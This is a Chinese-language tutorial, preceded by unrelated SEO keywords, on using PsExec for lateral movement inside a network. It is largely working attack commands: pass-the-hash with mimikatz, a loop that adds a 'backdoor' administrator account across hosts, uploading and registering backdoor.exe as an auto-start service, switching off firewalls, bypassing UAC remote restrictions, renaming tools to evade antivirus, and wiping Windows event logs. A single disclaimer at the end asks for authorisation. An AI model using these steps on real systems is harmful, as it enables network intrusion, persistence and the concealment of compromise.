ps网站参考线怎么做,网络服务商和网络运营商,石家庄互联网公司有哪些,品牌网站建设精湛磐石网络PsExec是微软Sysinternals套件中的轻量远程控制工具#xff0c;基于SMB协议#xff08;139、445端口#xff09;实现远程进程执行、Shell获取#xff0c;无需在目标主机提前安装客户端#xff0c;是内网渗透中“横向移动”的核心工具。其核心用法围绕“凭证远程执行”展开…PsExec是微软Sysinternals套件中的轻量远程控制工具基于SMB协议139、445端口实现远程进程执行、Shell获取无需在目标主机提前安装客户端是内网渗透中“横向移动”的核心工具。其核心用法围绕“凭证远程执行”展开全程需在合法授权范围内操作以下是完整使用流程、实操步骤、常见用法及避坑要点覆盖从前期准备到后期清理的全环节。一、渗透前置准备必做使用PsExec前需满足3个核心条件否则会导致操作失败提前排查可大幅提升渗透效率。1.1 工具与环境准备工具下载从微软官网下载Sysinternals套件解压后提取PsExec.exe32位/64位需匹配攻击机系统默认适配64位攻击机环境需为Windows系统PsExec原生适配WindowsLinux可通过Wine模拟但稳定性较差辅助工具搭配端口扫描工具nmap、masscan、凭证窃取工具Minikatz分别用于检测目标端口、获取登录凭证。1.2 目标主机条件排查网络可达攻击机与目标主机需处于同一内网或通过端口转发、代理实现连通无路由拦截端口开放目标主机需开放139NetBIOS、445SMB端口可通过命令nmap -p 139,445 目标IP检测凭证有效需获取目标主机的管理员凭证本地管理员/域管理员的明文密码或NTLM哈希凭证是PsExec使用的核心权限适配目标主机WinVista及以上版本默认开启UAC远程限制需提前处理下文有具体方法否则普通管理员账号无法登录。1.3 凭证获取途径补充PsExec依赖管理员凭证常见获取途径的通过phpMyAdmin突破Web服务器获取服务器Shell后提取本地管理员凭证通过Minikatz窃取已控制主机的明文密码、NTLM哈希域环境可提取域管理员凭证暴力破解、弱口令尝试如目标主机管理员使用弱口令从Web配置文件、数据库中提取服务器登录凭证。二、核心使用步骤从基础到进阶PsExec的核心用法分为“基础远程Shell获取→横向移动→恶意部署→信息收集”按步骤操作逐步扩大渗透范围。步骤1基础操作——远程获取交互式Shell核心这是PsExec最基础的用法目的是获取目标主机的控制权后续所有操作均基于此分2种场景单机/域环境。场景1单机环境目标主机未加入域适用目标是内网独立主机如办公电脑、非域控服务器持有本地管理员明文密码。// 基本命令获取cmd Shell PsExec.exe \\目标IP -u 本地管理员账号 -p 明文密码 cmd // 示例目标IP192.168.1.100账号admin密码123456 PsExec.exe \\192.168.1.100 -u admin -p 123456 cmd成功标志弹出目标主机的cmd窗口标题显示“\\192.168.1.100 - cmd”执行whoami可查看当前用户为管理员。场景2域环境目标主机加入域适用目标是域内主机如域成员服务器、域控制器持有域管理员明文密码。// 基本命令优先获取powershell Shell功能更强大 PsExec.exe \\目标IP -u 域名称\域管理员账号 -p 明文密码 powershell // 示例域名称test.com域管账号Administrator密码Test123456 PsExec.exe \\192.168.1.200 -u test\Administrator -p Test123456 powershell补充若需登录域控制器直接使用域管理员凭证登录后可执行域内高危操作如DCSync攻击。特殊情况无明文密码仅有NTLM哈希若仅获取NTLM哈希无法破解为明文需结合Minikatz实现哈希传递PtH无需明文即可登录。// 核心命令MinikatzPsExec联动 minikatz.exe privilege::debug sekurlsa::pth /user:管理员账号 /domain:目标IP/域名称 /ntlm:NTLM哈希值 /run:PsExec.exe \\目标IP cmd // 示例本地管理员账号admin哈希a1b2c3d4e5f6...目标IP192.168.1.100 minikatz.exe privilege::debug sekurlsa::pth /user:admin /domain:192.168.1.100 /ntlm:a1b2c3d4e5f6 /run:PsExec.exe \\192.168.1.100 cmd步骤2进阶操作——内网横向移动批量控制适用于已获取某台主机控制权提取到域内多台主机的凭证需批量登录其他主机扩大渗透范围。方法1批量存活主机检测先筛选内网存活主机避免无效操作需提前准备内网IP列表hostlist.txt每行一个IP。// 批量检测存活主机将结果保存至alive_hosts.txt for /f %i in (hostlist.txt) do PsExec.exe \\%i -u test\Administrator -p Test123456 ipconfig alive_hosts.txt说明执行成功的IP即为存活主机失败的IP会提示“无法连接”可直接筛选出有效目标。方法2批量执行命令控制多台主机向所有存活主机批量执行相同命令如创建后门账号、启动恶意程序提升渗透效率。// 批量创建后门账号账号backdoor密码Back123 for /f %i in (alive_hosts.txt) do PsExec.exe \\%i -u test\Administrator -p Test123456 net user backdoor Back123 /add net localgroup administrators backdoor /add步骤3高级操作——恶意程序部署与持久化获取目标主机控制权后通过PsExec部署恶意程序如Minikatz、后门实现长期控制即使目标主机重启也能重新获取权限。远程上传恶意程序通过SMB共享将恶意程序上传至目标主机隐蔽目录如C:\Tempcopy C:\本地恶意程序路径\backdoor.exe \\目标IP\C$\Temp\backdoor.exe通过PsExec启动恶意程序PsExec.exe \\目标IP -u 管理员账号 -p 密码 C:\Temp\backdoor.exe设置开机自启持久化将恶意程序注册为系统服务实现开机自动运行PsExec.exe \\目标IP -u 管理员账号 -p 密码 sc create SecretService binPath C:\Temp\backdoor.exe start auto步骤4辅助操作——凭证验证与信息收集渗透前期可通过PsExec验证凭证有效性、收集目标主机信息为后续渗透决策提供支撑。1. 凭证有效性验证// 验证账号密码是否有效、是否具备管理员权限 PsExec.exe \\目标IP -u 待验证账号 -p 待验证密码 whoami结果判断返回“Administrator”或“SYSTEM”说明凭证有效且有高权限返回“拒绝访问”说明凭证无效或权限不足。2. 目标主机信息收集无需获取完整Shell直接远程执行命令收集系统信息// 查看系统版本 PsExec.exe \\目标IP -u 管理员账号 -p 密码 systeminfo | findstr 操作系统版本 // 查看已登录用户域环境 PsExec.exe \\目标IP -u 域管账号 -p 密码 query user // 查看域管理员列表域环境 PsExec.exe \\目标IP -u 域管账号 -p 密码 net group Domain Admins /domain三、关键避坑要点实操必看PsExec操作中易出现“拒绝访问”“无法连接”等问题以下是常见问题及解决方法避免踩坑。UAC远程限制问题最常见 现象持有管理员凭证但执行PsExec提示“拒绝访问”解决方法修改目标主机注册表绕过UAC限制需先获取目标主机Shell命令reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f防火墙拦截问题 现象目标IP存活但139、445端口无法访问解决方法通过远程命令关闭目标主机防火墙需管理员权限命令PsExec.exe \\目标IP -u 管理员账号 -p 密码 netsh advfirewall set allprofiles state off工具被检测问题 现象PsExec运行后被杀毒软件、EDR查杀操作失败解决方法修改PsExec文件名如改为“svchost.exe”、使用自定义编译版本或通过内存加载执行避免文件落地。痕迹清理问题 渗透完成后需清理操作痕迹避免被运维人员发现关闭远程Shell直接关闭弹出的cmd/powershell窗口或执行taskkill /f /im cmd.exe删除上传文件PsExec.exe \\目标IP -u 管理员账号 -p 密码 del C:\Temp\backdoor.exe清理日志PsExec.exe \\目标IP -u 管理员账号 -p 密码 wevtutil cl System wevtutil cl Security。四、工具替代方案备用若PsExec被安全设备拦截可使用以下工具替代实现类似功能WMI/WMIC远程执行命令无需依赖PsExec命令示例wmic /node:目标IP /user:管理员账号 /password:密码 process call create cmd.exeCrackMapExec专门用于域内横向移动支持哈希传递操作更简洁psexec.pyPython版本的PsExec适配Linux攻击机可跨系统使用。五、总结使用PsExec进行内网渗透的核心逻辑是“凭证SMB协议”核心步骤为前置准备排查条件、获取凭证→ 基础操作获取远程Shell→ 进阶操作横向移动、恶意部署→ 后期清理痕迹清除。实操中需重点关注UAC绕过、防火墙拦截、工具检测三个核心问题同时结合Minikatz、phpMyAdmin等工具形成“Web突破→凭证窃取→横向移动”的完整渗透链路。重要提醒所有操作必须在合法授权范围内进行未授权渗透属于违法行为需承担相应法律责任。